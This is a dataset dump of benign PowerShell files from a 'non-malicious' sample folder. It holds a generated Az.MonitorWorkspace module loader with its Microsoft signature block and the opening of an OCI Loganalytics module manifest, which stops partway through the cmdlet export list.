full_path
stringlengths
31
232
filename
stringlengths
4
167
content
stringlengths
0
48.3M
combined_dataset/train/non-malicious/sample_51_52.ps1
sample_51_52.ps1
# region Generated # Load the private module dll $null = Import-Module -PassThru -Name (Join-Path $PSScriptRoot '..\bin\Az.MonitorWorkspace.private.dll') # Load the internal module $internalModulePath = Join-Path $PSScriptRoot '..\internal\Az.MonitorWorkspace.internal.psm1' if(Test-Path $internalModulePath) { $null = Import-Module -Name $internalModulePath } # Export nothing to clear implicit exports Export-ModuleMember # Export script cmdlets Get-ChildItem -Path $PSScriptRoot -Recurse -Include '*.ps1' -File | ForEach-Object { . $_.FullName } Export-ModuleMember -Function (Get-ScriptCmdlet -ScriptFolder $PSScriptRoot) -Alias (Get-ScriptCmdlet -ScriptFolder $PSScriptRoot -AsAlias) # endregion # SIG # Begin signature block # MIIoPAYJKoZIhvcNAQcCoIIoLTCCKCkCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCT4UFhvHK2uOda # D2W4HtwujwGes8BnpUOHjNW9ldXIhaCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAJv # ZLbGtm9RFdRXMQgylnyJdTtPyf2wXjg6yl9xtsPxMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAIziJX4xal4xjwWaS8pcwL5CwoRezI0lxL3/z # /lkVvBklBgVitMnE12Ud0HQqQS+9Kk29U6EmE1lyiMsBfCS3QDwBSlQAHVIo2hET # QVYbVog7zmRxazHRkBa+FUQP2MV3yBrf5fXl9GF1MbzbVtxhlaQDsDlSJGIbuVrU # RmtIP3rjIOiNwrl+gOEuvkqo8C73a2pJnve7yBZgEoPjNCAMWzHrN4ZSNfZzgkDd # Ytrg0Utn/Q9BaTjYoNvThS6gKVUKRF5e/ZbQhTxjK4tDpmC33a4udjUjsxyMt6g5 # M6Sj+9P0VuTIkzS6BIvwToGKHdY/knTFg8uG4MwbtknJzPA2CaGCF5cwgheTBgor # BgEEAYI3AwMBMYIXgzCCF38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCByvZpoSYRz/VSiFLfvtGeBV0HzkkFqYwHL # O3WWWOUUlAIGZjLBLzOAGBMyMDI0MDUxNjA2NDIxMi45NzNaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046ODYwMy0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHtMIIHIDCCBQigAwIBAgITMwAAAfGzRfUn6MAW1gAB # AAAB8TANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1NTVaFw0yNTAzMDUxODQ1NTVaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCxulCZttIf8X97rW9/J+Q4 # Vg9PiugB1ya1/DRxxLW2hwy4QgtU3j5fV75ZKa6XTTQhW5ClkGl6gp1nd5VBsx4J # b+oU4PsMA2foe8gP9bQNPVxIHMJu6TYcrrn39Hddet2xkdqUhzzySXaPFqFMk2Vi # fEfj+HR6JheNs2LLzm8FDJm+pBddPDLag/R+APIWHyftq9itwM0WP5Z0dfQyI4Wl # VeUS+votsPbWm+RKsH4FQNhzb0t/D4iutcfCK3/LK+xLmS6dmAh7AMKuEUl8i2kd # WBDRcc+JWa21SCefx5SPhJEFgYhdGPAop3G1l8T33cqrbLtcFJqww4TQiYiCkdys # CcnIF0ZqSNAHcfI9SAv3gfkyxqQNJJ3sTsg5GPRF95mqgbfQbkFnU17iYbRIPJqw # gSLhyB833ZDgmzxbKmJmdDabbzS0yGhngHa6+gwVaOUqcHf9w6kwxMo+OqG3QZIc # wd5wHECs5rAJZ6PIyFM7Ad2hRUFHRTi353I7V4xEgYGuZb6qFx6Pf44i7AjXbptU # olDcVzYEdgLQSWiuFajS6Xg3k7Cy8TiM5HPUK9LZInloTxuULSxJmJ7nTjUjOj5x # wRmC7x2S/mxql8nvHSCN1OED2/wECOot6MEe9bL3nzoKwO8TNlEStq5scd25GA0g # MQO+qNXV/xTDOBTJ8zBcGQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFLy2xe59sCE0 # SjycqE5Erb4YrS1gMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDhSEjSBFSCbJyl # 3U/QmFMW2eLPBknnlsfID/7gTMvANEnhq08I9HHbbqiwqDEHSvARvKtL7j0znICY # BbMrVSmvgDxU8jAGqMyiLoM80788So3+T6IZV//UZRJqBl4oM3bCIQgFGo0VTeQ6 # RzYL+t1zCUXmmpPmM4xcScVFATXj5Tx7By4ShWUC7Vhm7picDiU5igGjuivRhxPv # bpflbh/bsiE5tx5cuOJEJSG+uWcqByR7TC4cGvuavHSjk1iRXT/QjaOEeJoOnfes # bOdvJrJdbm+leYLRI67N3cd8B/suU21tRdgwOnTk2hOuZKs/kLwaX6NsAbUy9pKs # DmTyoWnGmyTWBPiTb2rp5ogo8Y8hMU1YQs7rHR5hqilEq88jF+9H8Kccb/1ismJT # GnBnRMv68Ud2l5LFhOZ4nRtl4lHri+N1L8EBg7aE8EvPe8Ca9gz8sh2F4COTYd1P # Hce1ugLvvWW1+aOSpd8NnwEid4zgD79ZQxisJqyO4lMWMzAgEeFhUm40FshtzXud # AsX5LoCil4rLbHfwYtGOpw9DVX3jXAV90tG9iRbcqjtt3vhW9T+L3fAZlMeraWfh # 7eUmPltMU8lEQOMelo/1ehkIGO7YZOHxUqeKpmF9QaW8LXTT090AHZ4k6g+tdpZF # fCMotyG+E4XqN6ZWtKEBQiE3xL27BDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNQMIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg2MDMtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQD7n7Bk4gsM2tbU/i+M3BtRnLj096CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6e+z1TAi # GA8yMDI0MDUxNTIyMjEwOVoYDzIwMjQwNTE2MjIyMTA5WjB3MD0GCisGAQQBhFkK # BAExLzAtMAoCBQDp77PVAgEAMAoCAQACAh7AAgH/MAcCAQACAhPGMAoCBQDp8QVV # AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSCh # CjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBABqo8eDklp7xyj/J1KHqvohA # T+xcQr7bazGDtKl9n8WOtiREz4ym2gXdI+q9HOX2GTdPfhozzW/5ltP/s57ozGCb # 5wJgSyjaXlNkcz1IDWFX/fDNxkNB1RHhcVZIW1CzbIsqJSOPgZgF1XOZsXDDqEDH # sTF2Nzeq43CXEU5tEmHWgVGsqnaJgBIeF6T0ddxH82RNCi3JYZNFkjTklFVc52/K # rCeP/gh3tEz1fEprvwQszcpL/wBWz9uMoosCZ6cpxiD1gz0QtAXhAEfoehTFUtH5 # SYoGf+2Lff3yA+f+TLCUYX2jzcOmlHw1i+2IkchTDotbhEmUvRQsIyHhF4HS7sYx # ggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv # bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 # aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA # AfGzRfUn6MAW1gABAAAB8TANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkD # MQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAjzSFjfv4/hanXv3PXxegW # EgJ4rLLNpXYThtTVCTRdVjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EINV3 # /T5hS7ijwao466RosB7wwEibt0a1P5EqIwEj9hF4MIGYMIGApH4wfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHxs0X1J+jAFtYAAQAAAfEwIgQgsWLI # pvK+iLqUI4xKW7vuW7TE1NRQThTsMKE0ok33WUwwDQYJKoZIhvcNAQELBQAEggIA # Cr/PZUHHZ4N75JVKCvcsySsps8DEYKLONZlFIQqkaMbQEUKq9ALAa8ITbChsTaJ+ # 6vHv3zym0JoIMbsWJ2S/UwNiLs5pxqNvtix9M9sb2/BJiTDlB0UA9F5U0kYEyLy3 # cdvL2N99SNX9+/kdVQ5LZkQ5hX2GIGxJ5x6RY3CT0Tf/W+XwUwrTOPNTrB6TcRkR # /gFfpF55gnNGY5iE4ctd2XwMvSNVwafjUwEXb7FpZq+XIJ9pTag8ldsuMn61CLML # xlzShVDWNoi1Xlh5ebJiDdYyA6jO+bcNNOEvhI0a6M89nEWnYXvTC7ywFN0jPEMk # E/+jxjlLzltfEI8pSJNO4Y6KS8J3QanvCebaM8148ktExlUvJMDgOrTH5UgPMofH # m/izq5gQgCvYTou+0/JAvqSUJcbh1LsNBO4+0cA3MCNEz9Ohn/79iNAl9eyIG7Zb # VU0EHmohLeLKHg76zUfvtMDEsFxlfhKDZ9ij3kElVPHgij8SyTU0iRp+9OGbdGHH # h/KF3aGZQCp734fOLsLdMqTE07NYMsSfLLcu9l/bhRe7prQgxXkingMPfDtwwRcx # FIHkgV/thHJUARXM3gZG/kfJY6owA5I0Ytkpy7En6sbBiWibL9vpbnPJUC4RjA9h # q8YbQow8MW6IyiBbvdh+pWpVbeADunZxb4OSIGowidw= # SIG # End signature block
combined_dataset/train/non-malicious/sample_20_19.ps1
sample_20_19.ps1
# # Module manifest for module 'OCI.PSModules.Loganalytics' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Loganalytics.dll' # Version number of this module. ModuleVersion = '79.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'a190d2eb-8d34-45b0-836a-ba4f1b2e1914' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Loganalytics Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Loganalytics.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCILoganalyticsEntityAssociation', 'Add-OCILoganalyticsSourceEventTypes', 'Confirm-OCILoganalyticsAssociationParameters', 